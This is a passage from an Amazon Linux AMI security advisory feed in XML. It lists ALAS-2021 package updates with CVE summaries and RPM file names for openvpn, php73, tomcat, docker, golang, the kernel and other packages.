</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36328" title="" id="CVE-2020-36328" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libwebp-tools" version="0.3.0" release="10.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwebp-tools-0.3.0-10.7.amzn1.x86_64.rpm</filename></package><package name="libwebp-devel" version="0.3.0" release="10.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwebp-devel-0.3.0-10.7.amzn1.x86_64.rpm</filename></package><package name="libwebp" version="0.3.0" release="10.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwebp-0.3.0-10.7.amzn1.x86_64.rpm</filename></package><package name="libwebp-debuginfo" version="0.3.0" release="10.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwebp-debuginfo-0.3.0-10.7.amzn1.x86_64.rpm</filename></package><package name="libwebp-java" version="0.3.0" release="10.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwebp-java-0.3.0-10.7.amzn1.x86_64.rpm</filename></package><package name="libwebp" version="0.3.0" release="10.7.amzn1" epoch="0" arch="i686"><filename>Packages/libwebp-0.3.0-10.7.amzn1.i686.rpm</filename></package><package name="libwebp-java" version="0.3.0" release="10.7.amzn1" epoch="0" arch="i686"><filename>Packages/libwebp-java-0.3.0-10.7.amzn1.i686.rpm</filename></package><package name="libwebp-debuginfo" version="0.3.0" release="10.7.amzn1" epoch="0" arch="i686"><filename>Packages/libwebp-debuginfo-0.3.0-10.7.amzn1.i686.rpm</filename></package><package name="libwebp-devel" version="0.3.0" release="10.7.amzn1" epoch="0" arch="i686"><filename>Packages/libwebp-devel-0.3.0-10.7.amzn1.i686.rpm</filename></package><package name="libwebp-tools" version="0.3.0" release="10.7.amzn1" epoch="0" arch="i686"><filename>Packages/libwebp-tools-0.3.0-10.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1531</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1531: important priority package update for openvpn</title><issued date="2021-09-02 22:54:00" /><updated date="2021-09-08 19:21:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-15078:
99999:OpenVPN 2.5.1 and earlier versions allows a remote attackers to bypass authentication and access control channel data on servers configured with deferred authentication, which can be used to potentially trigger further information leaks.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15078" title="" id="CVE-2020-15078" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openvpn-debuginfo" version="2.4.11" release="1.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/openvpn-debuginfo-2.4.11-1.48.amzn1.x86_64.rpm</filename></package><package name="openvpn" version="2.4.11" release="1.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/openvpn-2.4.11-1.48.amzn1.x86_64.rpm</filename></package><package name="openvpn-devel" version="2.4.11" release="1.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/openvpn-devel-2.4.11-1.48.amzn1.x86_64.rpm</filename></package><package name="openvpn-devel" version="2.4.11" release="1.48.amzn1" epoch="0" arch="i686"><filename>Packages/openvpn-devel-2.4.11-1.48.amzn1.i686.rpm</filename></package><package name="openvpn" version="2.4.11" release="1.48.amzn1" epoch="0" arch="i686"><filename>Packages/openvpn-2.4.11-1.48.amzn1.i686.rpm</filename></package><package name="openvpn-debuginfo" version="2.4.11" release="1.48.amzn1" epoch="0" arch="i686"><filename>Packages/openvpn-debuginfo-2.4.11-1.48.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1532</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1532: medium priority package update for php73</title><issued date="2021-09-02 22:54:00" /><updated date="2021-09-08 19:28:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-21705:
No description is available for this CVE.
1978755: CVE-2021-21705 php: SSRF bypass in FILTER_VALIDATE_URL
CVE-2021-21704:
Several flaws has been found in php. The pdo_firebase module does not check the length of the server version string in a response packet causing a stack buffer overflow, does not verify the data and uses the wrong type to cast length leading to a crash, and does not validate the response before calculation of the exec procedure leading to a crash. The highest threat from this vulnerability is to system availability.
1978790: CVE-2021-21704 php: security issues in pdo_firebase module
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21704" title="" id="CVE-2021-21704" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21705" title="" id="CVE-2021-21705" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php73-enchant" version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-enchant-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73-process" version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-process-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73" version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73-embedded" version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-embedded-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73-cli" version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-cli-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73-pspell" version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pspell-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73-debuginfo" version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-debuginfo-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73-gmp" version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-gmp-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73-fpm" version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-fpm-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73-recode" version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-recode-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73-opcache" version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-opcache-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73-mysqlnd" version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-mysqlnd-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73-dbg" version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-dbg-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73-dba" version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-dba-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73-snmp" version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-snmp-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73-ldap" version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-ldap-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73-pgsql" version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pgsql-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73-tidy" version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-tidy-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73-json" version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-json-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73-imap" version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-imap-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73-mbstring" version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-mbstring-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73-bcmath" version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-bcmath-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73-pdo-dblib" version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pdo-dblib-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73-pdo" version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pdo-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73-soap" version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-soap-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73-devel" version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-devel-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73-odbc" version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-odbc-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73-xmlrpc" version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-xmlrpc-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73-gd" version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-gd-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73-intl" version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-intl-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73-common" version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-common-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73-xml" version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-xml-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73-fpm" version="7.3.29" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php73-fpm-7.3.29-1.30.amzn1.i686.rpm</filename></package><package name="php73" version="7.3.29" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php73-7.3.29-1.30.amzn1.i686.rpm</filename></package><package name="php73-imap" version="7.3.29" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php73-imap-7.3.29-1.30.amzn1.i686.rpm</filename></package><package name="php73-pdo" version="7.3.29" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pdo-7.3.29-1.30.amzn1.i686.rpm</filename></package><package name="php73-odbc" version="7.3.29" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php73-odbc-7.3.29-1.30.amzn1.i686.rpm</filename></package><package name="php73-mysqlnd" version="7.3.29" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php73-mysqlnd-7.3.29-1.30.amzn1.i686.rpm</filename></package><package name="php73-ldap" version="7.3.29" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php73-ldap-7.3.29-1.30.amzn1.i686.rpm</filename></package><package name="php73-opcache" version="7.3.29" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php73-opcache-7.3.29-1.30.amzn1.i686.rpm</filename></package><package name="php73-dbg" version="7.3.29" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php73-dbg-7.3.29-1.30.amzn1.i686.rpm</filename></package><package name="php73-snmp" version="7.3.29" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php73-snmp-7.3.29-1.30.amzn1.i686.rpm</filename></package><package name="php73-common" version="7.3.29" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php73-common-7.3.29-1.30.amzn1.i686.rpm</filename></package><package name="php73-pdo-dblib" version="7.3.29" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pdo-dblib-7.3.29-1.30.amzn1.i686.rpm</filename></package><package name="php73-dba" version="7.3.29" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php73-dba-7.3.29-1.30.amzn1.i686.rpm</filename></package><package name="php73-embedded" version="7.3.29" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php73-embedded-7.3.29-1.30.amzn1.i686.rpm</filename></package><package name="php73-recode" version="7.3.29" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php73-recode-7.3.29-1.30.amzn1.i686.rpm</filename></package><package name="php73-devel" version="7.3.29" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php73-devel-7.3.29-1.30.amzn1.i686.rpm</filename></package><package name="php73-process" version="7.3.29" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php73-process-7.3.29-1.30.amzn1.i686.rpm</filename></package><package name="php73-pspell" version="7.3.29" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pspell-7.3.29-1.30.amzn1.i686.rpm</filename></package><package name="php73-gd" version="7.3.29" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php73-gd-7.3.29-1.30.amzn1.i686.rpm</filename></package><package name="php73-json" version="7.3.29" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php73-json-7.3.29-1.30.amzn1.i686.rpm</filename></package><package name="php73-tidy" version="7.3.29" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php73-tidy-7.3.29-1.30.amzn1.i686.rpm</filename></package><package name="php73-debuginfo" version="7.3.29" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php73-debuginfo-7.3.29-1.30.amzn1.i686.rpm</filename></package><package name="php73-xml" version="7.3.29" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php73-xml-7.3.29-1.30.amzn1.i686.rpm</filename></package><package name="php73-intl" version="7.3.29" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php73-intl-7.3.29-1.30.amzn1.i686.rpm</filename></package><package name="php73-soap" version="7.3.29" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php73-soap-7.3.29-1.30.amzn1.i686.rpm</filename></package><package name="php73-pgsql" version="7.3.29" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pgsql-7.3.29-1.30.amzn1.i686.rpm</filename></package><package name="php73-mbstring" version="7.3.29" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php73-mbstring-7.3.29-1.30.amzn1.i686.rpm</filename></package><package name="php73-xmlrpc" version="7.3.29" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php73-xmlrpc-7.3.29-1.30.amzn1.i686.rpm</filename></package><package name="php73-gmp" version="7.3.29" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php73-gmp-7.3.29-1.30.amzn1.i686.rpm</filename></package><package name="php73-bcmath" version="7.3.29" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php73-bcmath-7.3.29-1.30.amzn1.i686.rpm</filename></package><package name="php73-cli" version="7.3.29" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php73-cli-7.3.29-1.30.amzn1.i686.rpm</filename></package><package name="php73-enchant" version="7.3.29" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php73-enchant-7.3.29-1.30.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1533</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1533: important priority package update for postgresql-jdbc</title><issued date="2021-09-02 22:54:00" /><updated date="2021-09-08 19:28:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-13692:
A flaw was found in PostgreSQL JDBC in versions prior to 42.2.13. An XML External Entity (XXE) weakness was found in PostgreSQL JDBC. The highest threat from this vulnerability is to data confidentiality and system availability.
1852985: CVE-2020-13692 postgresql-jdbc: XML external entity (XXE) vulnerability in PgSQLXML
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13692" title="" id="CVE-2020-13692" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql-jdbc" version="8.4.704" release="4.13.amzn1" epoch="0" arch="noarch"><filename>Packages/postgresql-jdbc-8.4.704-4.13.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1534</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1534: low priority package update for tomcat7</title><issued date="2021-09-02 22:54:00" /><updated date="2021-09-08 19:29:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-30640:
A vulnerability in the JNDI Realm of Apache Tomcat allows an attacker to authenticate using variations of a valid user name and/or to bypass some of the protection provided by the LockOut Realm. This issue affects Apache Tomcat 10.0.0-M1 to 10.0.5; 9.0.0.M1 to 9.0.45; 8.5.0 to 8.5.65.
1981544: CVE-2021-30640 tomcat: JNDI realm authentication weakness
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30640" title="" id="CVE-2021-30640" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat7" version="7.0.109" release="1.41.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-7.0.109-1.41.amzn1.noarch.rpm</filename></package><package name="tomcat7-lib" version="7.0.109" release="1.41.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-lib-7.0.109-1.41.amzn1.noarch.rpm</filename></package><package name="tomcat7-admin-webapps" version="7.0.109" release="1.41.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-admin-webapps-7.0.109-1.41.amzn1.noarch.rpm</filename></package><package name="tomcat7-jsp-2.2-api" version="7.0.109" release="1.41.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-jsp-2.2-api-7.0.109-1.41.amzn1.noarch.rpm</filename></package><package name="tomcat7-docs-webapp" version="7.0.109" release="1.41.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-docs-webapp-7.0.109-1.41.amzn1.noarch.rpm</filename></package><package name="tomcat7-el-2.2-api" version="7.0.109" release="1.41.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-el-2.2-api-7.0.109-1.41.amzn1.noarch.rpm</filename></package><package name="tomcat7-webapps" version="7.0.109" release="1.41.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-webapps-7.0.109-1.41.amzn1.noarch.rpm</filename></package><package name="tomcat7-log4j" version="7.0.109" release="1.41.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-log4j-7.0.109-1.41.amzn1.noarch.rpm</filename></package><package name="tomcat7-servlet-3.0-api" version="7.0.109" release="1.41.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-servlet-3.0-api-7.0.109-1.41.amzn1.noarch.rpm</filename></package><package name="tomcat7-javadoc" version="7.0.109" release="1.41.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-javadoc-7.0.109-1.41.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1535</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1535: medium priority package update for tomcat8</title><issued date="2021-09-02 22:54:00" /><updated date="2021-09-08 19:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-33037:
Apache Tomcat 10.0.0-M1 to 10.0.6, 9.0.0.M1 to 9.0.46 and 8.5.0 to 8.5.66 did not correctly parse the HTTP transfer-encoding request header in some circumstances leading to the possibility to request smuggling when used with a reverse proxy. Specifically: - Tomcat incorrectly ignored the transfer encoding header if the client declared it would only accept an HTTP/1.0 response; - Tomcat honoured the identify encoding; and - Tomcat did not ensure that, if present, the chunked encoding was the final encoding.
1981533: CVE-2021-33037 tomcat: HTTP request smuggling when used with a reverse proxy
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33037" title="" id="CVE-2021-33037" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat8-el-3.0-api" version="8.5.69" release="1.88.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.5.69-1.88.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.5.69" release="1.88.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.5.69-1.88.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.5.69" release="1.88.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.5.69-1.88.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.5.69" release="1.88.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.5.69-1.88.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.5.69" release="1.88.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.5.69-1.88.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.5.69" release="1.88.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.5.69-1.88.amzn1.noarch.rpm</filename></package><package name="tomcat8" version="8.5.69" release="1.88.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.5.69-1.88.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.5.69" release="1.88.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.5.69-1.88.amzn1.noarch.rpm</filename></package><package name="tomcat8-log4j" version="8.5.69" release="1.88.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.5.69-1.88.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.5.69" release="1.88.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.5.69-1.88.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1536</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1536: important priority package update for ca-certificates</title><issued date="2021-09-30 20:41:00" /><updated date="2021-10-04 22:24:00" /><severity>important</severity><description /><references /><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ca-certificates" version="2018.2.22" release="65.1.24.amzn1" epoch="0" arch="noarch"><filename>Packages/ca-certificates-2018.2.22-65.1.24.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1537</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1537: medium priority package update for docker</title><issued date="2021-09-30 19:22:00" /><updated date="2021-10-04 22:22:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-41092:
CVE-2021-41092 docker:
A bug was found in the Docker CLI where running docker login my-private-registry.example.com with a misconfigured configuration file (typically ~/.docker/config.json) listing a credsStore or credHelpers that could not be executed would result in any provided credentials being sent to registry-1.docker.io rather than the intended private registry.
CVE-2021-41091:
CVE-2021-41091 docker:
A bug was found in Moby (Docker Engine) where the data directory (typically /var/lib/docker) contained subdirectories with insufficiently restricted permissions, allowing otherwise unprivileged Linux users to traverse directory contents and execute programs. When containers included executable programs with extended permission bits (such as setuid), unprivileged Linux users could discover and execute those programs. When the UID of an unprivileged Linux user on the host collided with the file owner or group inside a container, the unprivileged Linux user on the host could discover, read, and modify those files.
CVE-2021-41089:
CVE-2021-41089 docker:
A bug was found in Moby (Docker Engine) where attempting to copy files using docker cp into a specially-crafted container can result in Unix file permission changes for existing files in the host 2019s filesystem, widening access to others. This bug does not directly allow files to be read, modified, or executed without an additional cooperating process.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41089" title="" id="CVE-2021-41089" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41091" title="" id="CVE-2021-41091" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41092" title="" id="CVE-2021-41092" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="docker" version="20.10.7" release="3.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-20.10.7-3.71.amzn1.x86_64.rpm</filename></package><package name="docker-debuginfo" version="20.10.7" release="3.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-debuginfo-20.10.7-3.71.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1538</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1538: medium priority package update for golang</title><issued date="2021-09-30 19:24:00" /><updated date="2021-10-04 22:19:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-36221:
A race condition flaw was found in Go. The incoming requests body weren't closed after the handler panic and as a consequence this could lead to ReverseProxy crash. The highest threat from this vulnerability is to Availability.
1995656: CVE-2021-36221 golang: net/http/httputil: panic due to racy read of persistConn after handler panic
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36221" title="" id="CVE-2021-36221" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="golang-docs" version="1.15.15" release="1.71.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-docs-1.15.15-1.71.amzn1.noarch.rpm</filename></package><package name="golang-race" version="1.15.15" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-race-1.15.15-1.71.amzn1.x86_64.rpm</filename></package><package name="golang-tests" version="1.15.15" release="1.71.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-tests-1.15.15-1.71.amzn1.noarch.rpm</filename></package><package name="golang" version="1.15.15" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-1.15.15-1.71.amzn1.x86_64.rpm</filename></package><package name="golang-misc" version="1.15.15" release="1.71.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-misc-1.15.15-1.71.amzn1.noarch.rpm</filename></package><package name="golang-bin" version="1.15.15" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-bin-1.15.15-1.71.amzn1.x86_64.rpm</filename></package><package name="golang-src" version="1.15.15" release="1.71.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-src-1.15.15-1.71.amzn1.noarch.rpm</filename></package><package name="golang" version="1.15.15" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/golang-1.15.15-1.71.amzn1.i686.rpm</filename></package><package name="golang-bin" version="1.15.15" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/golang-bin-1.15.15-1.71.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1539</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1539: important priority package update for kernel</title><issued date="2021-09-30 19:25:00" /><updated date="2025-02-27 23:43:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-28772:
An issue was discovered in the Linux kernel before 5.13.3. lib/seq_buf.c has a seq_buf_putmem_hex buffer overflow.
CVE-2022-20141:
In ip_check_mc_rcu of igmp.c, there is a possible use after free due to improper locking. This could lead to local escalation of privilege when opening and closing inet sockets with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-112551163References: Upstream kernel
CVE-2021-47309:
In the Linux kernel, the following vulnerability has been resolved:
net: validate lwtstate->data before returning from skb_tunnel_info()
CVE-2021-40490:
A flaw was found in the Linux kernel. A race condition was discovered in the ext4 subsystem. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
CVE-2021-38205:
A flaw was found in the Linux kernel that allows attackers to defeat an ASLR protection mechanism because it prints a kernel pointer (i.e., the real IOMEM pointer). The highest threat from this vulnerability is to confidentiality.
CVE-2021-38204:
A flaw was found in the Linux kernel. A denial of service attack (use-after-free and panic) can be caused by a physically proximate attack by removing a MAX-3421 USB device in certain situations. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
CVE-2021-38198:
A flaw was found in the Linux kernel, where it incorrectly computes the access permissions of a shadow page. This issue leads to a missing guest protection page fault.
CVE-2021-38160:
** DISPUTED ** In drivers/char/virtio_console.c in the Linux kernel before 5.13.4, data corruption or loss can be triggered by an untrusted device that supplies a buf->len value exceeding the buffer size. NOTE: the vendor indicates that the cited data corruption is not a vulnerability in any existing use case; the length validation was added solely for robustness in the face of anomalous host OS behavior.
CVE-2021-37576:
A flaw was found on the Linux kernel. On the PowerPC platform, the KVM guest allows the OS users to cause host OS memory corruption via rtas_args.nargs. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
CVE-2021-3753:
